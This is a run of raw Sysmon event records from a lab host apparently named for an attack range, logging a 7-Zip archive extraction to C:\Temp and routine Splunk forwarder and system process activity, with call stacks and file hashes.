10:56:00.273{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.273{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.273{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.273{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.273{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.156{C8EA50B7-F11F-6215-1500-000000003802}10921636C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.156{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.134{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.118{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289807Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.118{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289806Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.118{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289805Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.118{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289804Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.002{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289803Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:59.986{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:59.986{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:59.986{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:59.986{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:59.986{C8EA50B7-F2AD-6215-C000-000000003802}48565992C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\7-Zip\7-zip.dll+545c|C:\Program Files\7-Zip\7-zip.dll+67e5|C:\Program Files\7-Zip\7-zip.dll+6fbe|C:\Program Files\7-Zip\7-zip.dll+70d9|C:\Program Files\7-Zip\7-zip.dll+8e20|C:\Program Files\7-Zip\7-zip.dll+c301|C:\Windows\System32\SHELL32.dll+80407|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+17c35c|C:\Windows\System32\SHELL32.dll+19eb28|C:\Windows\System32\SHELL32.dll+2846f3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+17c600|C:\Windows\System32\SHELL32.dll+179a7e|C:\Windows\System32\SHELL32.dll+73861|C:\Windows\System32\SHELL32.dll+76746|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15 154100x8000000000000000289798Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:59.998{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe21.077-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Temp\" -an -ai#7zMap25201:90:7zEvent22519C:\Windows\system32\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=300B8E1F636DCDE7269EF18600493819,SHA256=3AEF7662DCDBBC952A3ECD3677DA943EF3D4AECB5BD624625B6B176B1B5CE617,IMPHASH=C60649CDE63EC51599F93CD2D0157322{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x8000000000000000289837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.858{C8EA50B7-12C1-6216-4205-000000003802}36525896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.720{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B691A2360313CD8DB152E65AECC93C93,SHA256=F122BB6293F970264B51DFDD899EAC3529809F920DBA5C2FFF5856453C60F003,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:01.331{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C96D12A76A5C0B762382888B9785CCD7,SHA256=6D59EE4377F8131A5EE95DDE057D31C52ED224708868BEEBF9BDA30D1CE9FADB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.435{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-12C1-6216-4205-000000003802}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.420{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-12C1-6216-4205-000000003802}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.420{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.420{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.420{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.420{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.420{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-12C1-6216-4205-000000003802}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:01.422{C8EA50B7-12C1-6216-4205-000000003802}3652C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000289849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 